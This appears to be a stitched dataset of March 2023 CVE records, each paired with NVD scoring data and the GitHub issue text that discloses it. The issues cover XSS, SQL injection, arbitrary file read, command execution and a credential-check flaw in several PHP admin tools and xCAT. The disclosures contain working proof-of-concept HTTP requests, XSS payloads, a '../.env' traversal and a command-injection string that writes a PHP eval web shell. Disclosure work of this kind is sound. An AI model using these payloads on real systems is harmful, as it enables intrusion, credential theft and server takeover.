Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close` <img width="1068" alt="image" src="https://user-images.githubusercontent.com/122217858/215309790-f375755c-128a-4750-9d30-18d99ffb12bf.png">
Database management plug-in table.php columns-sql injection vulnerability
https://api.github.com/repos/funadmin/funadmin/issues/6/comments
1
2023-01-29T06:43:10Z
2023-05-05T06:40:40Z
https://github.com/funadmin/funadmin/issues/6
1,561,150,447
6
4,812
CVE-2023-24657
2023-03-08T06:15:44.490
phpipam v1.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the closeClass parameter at /subnet-masks/popup.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/phpipam/phpipam/issues/3738" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/phpipam/phpipam/issues/3738" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "76AB84E7-3B77-4A35-B047-7DE3D2D77950", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpipam/phpipam/issues/3738
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "phpipam", "phpipam" ]
phpipam 1.6 (looking at the changelog, tested on 1.5 demo at https://demo.phpipam.net/login/timeout/) has a reflected cross-site scripting vulnerability that is executed by exploiting parameter 'closeClass'. Example of vulnerable URL: https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass="><script>alert("XSS")</script> ![XSS](https://user-images.githubusercontent.com/108727010/214061357-307827b2-1cea-44b4-be36-a11fd41284a8.PNG) Vulnerable source code: https://github.com/phpipam/phpipam/blob/master/app/tools/subnet-masks/popup.php ``` <!-- footer --> <div class="pFooter"> <div class="btn-group"> <button class="btn btn-sm btn-default <?php print @$_REQUEST['closeClass']; ?>"><?php print _('Close'); ?></button> </div> </div> ``` (partial) Browser's response : ``` <!-- footer --> <div class="pFooter"> <div class="btn-group"> <button class="btn btn-sm btn-default "><script>alert("XSS")</script>">Close</button> </div> </div> ```
Reflected XSS at /app/tools/subnet-masks/popup.php
https://api.github.com/repos/phpipam/phpipam/issues/3738/comments
1
2023-01-23T14:20:33Z
2024-03-20T09:23:10Z
https://github.com/phpipam/phpipam/issues/3738
1,553,186,791
3,738
4,813
CVE-2023-26950
2023-03-08T13:15:10.130
onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Title parameter under the Adding Categories module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/keheying/onekeyadmin/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/keheying/onekeyadmin/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onekeyadmin:onekeyadmin:1.3.9:*:*:*:*:*:*:*", "matchCriteriaId": "308108A9-2A64-4A1D-A631-8E0D4820E7C6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/keheying/onekeyadmin/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "keheying", "onekeyadmin" ]
1. Vulnerability affects product:onekeyadmin 2. Vulnerability affects version 1.3.9 3. Vulnerability type:storage xss vulnerability๏ผˆCross-site scripting๏ผ‰ 4. Vulnerability Details๏ผš <img src=1 onerror=alert("xss");> url http://192.168.3.129:8091/admin1#catalog/index <img width="1007" alt="image" src="https://user-images.githubusercontent.com/122217858/211449085-6515597a-4ad8-4236-8856-0ece625e9aab.png"> poc POST /admin1/catalog/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 334 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/catalog/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close {"cover":"","title":"test<img src=1 onerror=alert(\"xss\");>","pid":0,"show":1,"type":"page","seo_url":"test","bind_html":"","group_id":[],"links_type":0,"links_value":{},"sort":0,"id":"","status":1,"mobile":1,"blank":0,"description":"","content":"","seo_title":"","seo_keywords":"","seo_description":"","field":[],"theme":"template"} <img width="1017" alt="image" src="https://user-images.githubusercontent.com/122217858/211449133-1af69f4d-dde3-4883-a69e-02bbcf32a07f.png"> then you can view xss in url http://192.168.3.129:8091/admin1#catalog/index <img width="986" alt="image" src="https://user-images.githubusercontent.com/122217858/211449169-cee33dc6-bca9-41ee-b291-255532ff2269.png">
Background category management - adding categories has a storage xss vulnerability
https://api.github.com/repos/keheying/onekeyadmin/issues/9/comments
1
2023-01-10T02:37:38Z
2023-03-20T02:13:12Z
https://github.com/keheying/onekeyadmin/issues/9
1,526,665,614
9
4,814
CVE-2023-26952
2023-03-08T14:15:09.823
onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Menu module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/keheying/onekeyadmin/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/keheying/onekeyadmin/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onekeyadmin:onekeyadmin:1.3.9:*:*:*:*:*:*:*", "matchCriteriaId": "308108A9-2A64-4A1D-A631-8E0D4820E7C6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/keheying/onekeyadmin/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "keheying", "onekeyadmin" ]
1. Vulnerability affects product:onekeyadmin 2. Vulnerability affects version 1.3.9 3. Vulnerability type:storage xss vulnerability๏ผˆCross-site scripting๏ผ‰ 4. Vulnerability Details๏ผš url http://192.168.3.129:8091/admin1#adminMenu/index <img width="923" alt="image" src="https://user-images.githubusercontent.com/122217858/211448785-520621b1-13e7-47ba-8877-dea426ccd218.png"> poc POST /admin1/adminMenu/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 145 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/adminMenu/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close {"id":"","icon":"","title":"test<img src=1 onerror=alert(\"xss\");>","pid":0,"sort":0,"path":"test","ifshow":1,"logwriting":1,"theme":"template"} <img width="1006" alt="image" src="https://user-images.githubusercontent.com/122217858/211448829-ae68d2ab-47ad-428b-9194-e79dbeae38ca.png"> then you can view xss in url http://192.168.3.129:8091/admin1#adminMenu/index <img width="1008" alt="image" src="https://user-images.githubusercontent.com/122217858/211448853-c849d705-1eb2-44a4-895a-7bffe3bfaad4.png">
Background menu rules - add menu has storage xss vulnerability
https://api.github.com/repos/keheying/onekeyadmin/issues/7/comments
1
2023-01-10T02:34:44Z
2023-03-20T02:14:24Z
https://github.com/keheying/onekeyadmin/issues/7
1,526,663,841
7
4,815
CVE-2023-24773
2023-03-08T16:15:09.403
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:funadmin:funadmin:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "CC800090-6420-4971-831D-1E77A18BD45E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/funadmin/funadmin/issues/4
[ "Exploit", "Issue Tracking" ]
github.com
[ "funadmin", "funadmin" ]
Vulnerability Product:funadmin Vulnerability version:.3.2.0 Vulnerability type:sql injection Vulnerability Details๏ผš Database management plug-in database.php list-sql injection vulnerability Vulnerability occurs in plugin - database management plugin <img width="1225" alt="image" src="https://user-images.githubusercontent.com/122217858/215309557-77269b4a-a097-44fb-86d3-e4c556a533bb.png"> Code Audit Process Vulnerability occurs in app\databases\controller\Database.php#list method <img width="1223" alt="image" src="https://user-images.githubusercontent.com/122217858/215309573-0fd6bf28-3a59-4921-9aab-8a35ca9ec811.png"> <img width="1228" alt="image" src="https://user-images.githubusercontent.com/122217858/215309590-b960654d-3a42-4ae2-9a36-f71498a519fc.png"> Get the id directly and splice it into the sql statement Vulnerability reproduction: Background administrator rights sqlmap poc save as txt `POST /databases/database/list?id=* HTTP/1.1 Host: 192.168.3.129:8092 Content-Length: 187 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close TABLE_NAME=fun_addon&ENGINE=InnoDB&TABLE_COMMENT=%E5%85%AC%E7%94%A8_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE_ROWS=7&TABLE_COLLATION=utf8mb4_unicode_ci&__token__=d659d1ffb4e68ff1910c1c7c75a43539` python sqlmap.py -r poc.txt <img width="989" alt="image" src="https://user-images.githubusercontent.com/122217858/215309621-6b1b745d-6b16-4e3e-b48c-b0693bca3f9f.png">
Database management plug-in database.php list-sql injection vulnerability
https://api.github.com/repos/funadmin/funadmin/issues/4/comments
1
2023-01-29T06:38:54Z
2023-05-05T06:40:39Z
https://github.com/funadmin/funadmin/issues/4
1,561,149,560
4
4,816
CVE-2023-26922
2023-03-08T16:15:09.470
SQL injection vulnerability found in Varisicte matrix-gui v.2 allows a remote attacker to execute arbitrary code via the shell_exect parameter to the \www\pages\matrix-gui-2.0 endpoint.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/varigit/matrix-gui-v2/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/varigit/matrix-gui-v2/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:variscite:matrix-gui:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E8935ED0-EBA2-434A-92E9-09665E5DD12D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/varigit/matrix-gui-v2/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "varigit", "matrix-gui-v2" ]
The execute-command.php file exists in the \www\pages\matrix-gui-2.0 directory of the firmware Vulnerability type: command execution This source code is used for the tbox in the Internet of Vehicles, which can control the car's brain, so it is very dangerous ![ไธ‹่ฝฝ](https://user-images.githubusercontent.com/65775367/218629265-078461b9-5d79-445b-b587-9ad60b81b770.png) ![ไธ‹่ฝฝ](https://user-images.githubusercontent.com/65775367/218629386-9fd1ddbe-c19d-4aa4-ada3-2a0fa8ab6aa7.jpg) `<?php $command = $_GET['command']; $output = shell_exec($command); echo $output; ?> ` Through shell_ Exec carries out command execution, and the execution content is controlled by the command of get parameter transfer Vulnerability exploitation process: Pass the parameter command to the shell through get_ Exec for command execution and final output POC๏ผš /execute-command.php?command=ls /execute-command.php?command=echo "<?php @eval(\$_POST['test']);?>" > shell.php Example: http://192.168.160.128:7777/execute-command.php?command=ls ![image](https://user-images.githubusercontent.com/65775367/218624776-6237e28b-61de-4256-bf8f-4581526456c7.png) /execute-command.php?command=echo "<?php @eval(\$_POST['test']);?>" > shell.php ![image](https://user-images.githubusercontent.com/65775367/218624886-262328d2-f43a-4900-8de9-f1b09bbe8a38.png) ![image](https://user-images.githubusercontent.com/65775367/218624899-7bac8ee6-5cb2-44a1-8929-01638f8cb33b.png) To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.
execute-command.php Command execution vulnerability
https://api.github.com/repos/varigit/matrix-gui-v2/issues/1/comments
0
2023-02-14T02:39:49Z
2023-02-14T03:10:47Z
https://github.com/varigit/matrix-gui-v2/issues/1
1,583,390,522
1
4,817
CVE-2023-26956
2023-03-08T19:15:11.020
onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/curd/code.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/keheying/onekeyadmin/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/keheying/onekeyadmin/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onekeyadmin:onekeyadmin:1.3.9:*:*:*:*:*:*:*", "matchCriteriaId": "308108A9-2A64-4A1D-A631-8E0D4820E7C6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "552" ]
552
https://github.com/keheying/onekeyadmin/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "keheying", "onekeyadmin" ]
Vulnerability affects product:onekeyadmin Vulnerability affects version 1.3.9 Vulnerability type:file reading Vulnerability Details๏ผš Vulnerability location app\admin\controller\Curd#code Here the file_get_contents function is called without any filtering <img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211448366-0a317737-9491-4cd6-af6b-9698c4f96784.png"> So we can write the file we want to read into menu.png to cause any file to be read Vulnerability recurrence Here we read the database configuration file .env in the root directory poc `POST /admin1/curd/code HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 59 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/curd/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close {"name":"test","title":"test","cover":"../.env","table":[]}` <img width="955" alt="image" src="https://user-images.githubusercontent.com/122217858/211448409-1051109b-f270-4e5b-bdf3-3ef1f4a1554f.png"> You can see that the file was successfully written to our menu.png, causing any file to be read http://192.168.3.129:8091/plugins/test/menu.png <img width="882" alt="image" src="https://user-images.githubusercontent.com/122217858/211448439-551b5980-936d-462d-8c14-8728e7032a47.png">
Background development assistant arbitrary file reading vulnerability
https://api.github.com/repos/keheying/onekeyadmin/issues/4/comments
1
2023-01-10T02:31:12Z
2023-03-20T02:15:15Z
https://github.com/keheying/onekeyadmin/issues/4
1,526,661,312
4
4,818
CVE-2023-27486
2023-03-08T19:15:11.073
xCAT is a toolkit for deployment and administration of computer clusters. In versions prior to 2.16.5 if zones are configured as a mechanism to secure clusters in XCAT, it is possible for a local root user from one node to obtain credentials to SSH to any node in any zone, except the management node of the default zone. XCAT zones are not enabled by default. Only users that use the optional zone feature are impacted. All versions of xCAT prior to xCAT 2.16.5 are vulnerable. This problem has been fixed in xCAT 2.16.5. Users making use of zones should upgrade to 2.16.5. Users unable to upgrade may mitigate the issue by disabling zones or patching the management node with the fix contained in commit `85149c37f49`.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xcat2/xcat-core/issues/7246" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/xcat2/xcat-core/pull/7247" }, { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/xcat2/xcat-core/pull/7247/commits/85149c37f49dbca7bd85f1f586960315604fc024" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/xcat2/xcat-core/security/advisories/GHSA-hpxg-7428-6jvv" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xcat2/xcat-core/issues/7246" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/xcat2/xcat-core/pull/7247" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/xcat2/xcat-core/pull/7247/commits/85149c37f49dbca7bd85f1f586960315604fc024" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/xcat2/xcat-core/security/advisories/GHSA-hpxg-7428-6jvv" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xcat_project:xcat:*:*:*:*:*:*:*:*", "matchCriteriaId": "B1E99110-D3F9-49CA-84F9-DB7E457AEE59", "versionEndExcluding": "2.16.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/xcat2/xcat-core/issues/7246
[ "Exploit", "Issue Tracking" ]
github.com
[ "xcat2", "xcat-core" ]
Hi, I recognize that one can request the ssh_root_key's of every zone from every client independently of its zone affiliation by a simple script using getcredentials.awk and allowcred.awk. This is a security issue if you use multiple zones with sshbetweenodes=no to avoid a privilege escalation to other nodes. It seems that in credentials.pm of the xcatd following checks are missing: If a ssh_root_key was requested check - if the client is in the zone of the requested key's zone otherwise reject the request. - if the sshbetweennodes is set to yes in the requested zone, otherwise reject the request best
Unsufficient check in credentials.pm
https://api.github.com/repos/xcat2/xcat-core/issues/7246/comments
9
2022-09-05T15:49:14Z
2023-03-07T18:46:40Z
https://github.com/xcat2/xcat-core/issues/7246
1,362,210,362
7,246
4,819
CVE-2023-24782
2023-03-08T21:15:10.943
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/edit.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:funadmin:funadmin:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "CC800090-6420-4971-831D-1E77A18BD45E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/funadmin/funadmin/issues/3
[ "Exploit", "Issue Tracking" ]
github.com
[ "funadmin", "funadmin" ]
